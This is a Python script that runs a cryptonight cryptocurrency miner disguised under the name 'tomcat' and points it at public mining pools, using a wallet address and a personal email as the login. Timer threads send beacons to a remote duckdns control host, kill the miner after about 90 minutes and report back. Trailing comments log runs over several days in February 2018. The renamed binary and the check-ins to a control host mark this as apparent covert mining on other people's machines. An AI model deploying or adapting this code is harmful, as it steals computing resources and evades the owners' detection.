import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:07.392012
#2018-02-17 16:34:06.195075
#2018-02-17 18:22:05.130546
#2018-02-17 20:10:01.437592
#2018-02-17 21:57:06.062513
#2018-02-17 23:41:09.092704
#2018-02-18 01:31:04.918170
#2018-02-18 03:17:05.215919
#2018-02-18 05:06:07.219255
#2018-02-18 06:58:06.811885
#2018-02-18 08:48:03.579860
#2018-02-18 10:35:05.052224
#2018-02-18 12:20:05.777044
#2018-02-18 14:07:01.949192
#2018-02-18 15:57:07.136632
#2018-02-18 17:48:04.966915
#2018-02-18 19:37:04.938550
#2018-02-18 21:22:07.536038
#2018-02-18 23:11:06.299897
#2018-02-19 00:56:07.076476
#2018-02-19 02:43:02.112187
#2018-02-19 04:30:07.088034
#2018-02-19 06:15:09.377242
#2018-02-19 08:03:06.845250
#2018-02-19 09:53:07.066377
#2018-02-19 11:42:08.882136
#2018-02-19 13:29:05.670545
#2018-02-19 15:17:04.100832
#2018-02-19 17:04:02.193534
#2018-02-19 18:49:05.949556
#2018-02-19 20:38:03.807965
#2018-02-19 22:24:05.717624
#2018-02-20 00:12:01.483061
#2018-02-20 01:59:07.151263
#2018-02-20 03:49:05.060512
#2018-02-20 05:34:06.949680
#2018-02-20 07:18:01.771482
#2018-02-20 09:04:05.010867
#2018-02-20 10:47:09.001199
#2018-02-20 12:34:06.581012
#2018-02-20 14:20:05.757615
#2018-02-20 16:04:08.536491
#2018-02-20 17:50:18.087807
#2018-02-20 19:42:01.492981
#2018-02-20 21:28:08.199313
#2018-02-20 23:13:04.799780
#2018-02-21 00:57:05.784961
#2018-02-21 02:45:06.180523
#2018-02-21 04:31:03.811914
#2018-02-21 06:18:06.584030
#2018-02-21 08:04:05.482002
#2018-02-21 09:50:09.254038
#2018-02-21 11:40:03.465067
#2018-02-21 13:29:05.995209
#2018-02-21 15:14:07.374940
#2018-02-21 17:04:07.708634
#2018-02-21 18:52:09.473905
#2018-02-21 20:42:08.574167
#2018-02-21 22:28:05.603644
#2018-02-22 00:19:07.370108
#2018-02-22 02:06:04.207588
#2018-02-22 03:53:01.928387
#2018-02-22 05:39:07.409745
#2018-02-22 07:24:07.500993
#2018-02-22 09:12:08.041237
#2018-02-22 10:59:01.435747
#2018-02-22 12:44:08.307800
#2018-02-22 14:30:04.634696
#2018-02-22 16:16:08.576325
#2018-02-22 18:03:08.459696
#2018-02-22 19:53:09.075803
#2018-02-22 21:41:07.615699
#2018-02-22 23:31:04.473578
#2018-02-23 01:19:07.877611
#2018-02-23 03:07:05.758794
#2018-02-23 04:55:07.980484
#2018-02-23 06:41:02.187167
#2018-02-23 08:31:01.729479
#2018-02-23 10:45:10.423548
#2018-02-23 12:43:09.559728
#2018-02-23 14:28:01.731478
#2018-02-23 16:19:05.125684
#2018-02-23 18:06:07.974714
#2018-02-23 19:50:08.676080
#2018-02-23 21:33:08.420979
#2018-02-23 23:22:08.273657
#2018-02-24 01:16:01.687821
#2018-02-24 03:07:01.654358
#2018-02-24 04:52:08.053985
#2018-02-24 06:38:07.483218
#2018-02-24 08:29:04.049707
#2018-02-24 10:16:01.583913
#2018-02-24 12:11:04.150742
#2018-02-24 13:58:05.986305
#2018-02-24 15:49:06.480760
#2018-02-24 17:42:05.449216
#2018-02-24 19:26:05.486594
#2018-02-24 21:16:04.965474
#2018-02-24 23:52:06.260864
#2018-02-25 03:10:06.333691
#2018-02-25 06:45:07.966924